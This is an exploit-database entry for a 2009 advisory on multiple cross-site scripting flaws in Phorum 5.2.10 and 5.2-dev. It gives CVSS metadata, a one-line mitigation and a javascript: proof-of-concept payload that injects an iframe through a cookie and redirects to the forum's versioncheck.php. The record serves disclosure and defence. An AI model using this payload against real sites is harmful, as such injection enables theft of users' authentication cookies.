header-logo
Suggest Exploit
vendor:
Phorum
by:
SecurityFocus
7.5
CVSS
HIGH
Cross-Site Scripting
79
CWE
Product Name: Phorum
Affected Version From: 5.2.10
Affected Version To: 5.2-dev
Patch Exists: YES
Related CWE: N/A
CPE: phorum/5.2.10
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Phorum Multiple Cross-Site Scripting Vulnerabilities

Phorum is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks.

Mitigation:

Input validation should be used to ensure that user-supplied data is properly sanitized.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/34551/info
   
Phorum is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
   
An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks.
   
Phorum 5.2.10 and 5.2-dev are vulnerable; other versions may also be affected. 

javascript:with(document)cookie="phorum_upgrade_available=
<iframe/src='javascript:alert(/voodoo/.source)'>",
location="http://www.victim.com/phorum-5.2.10/versioncheck.php";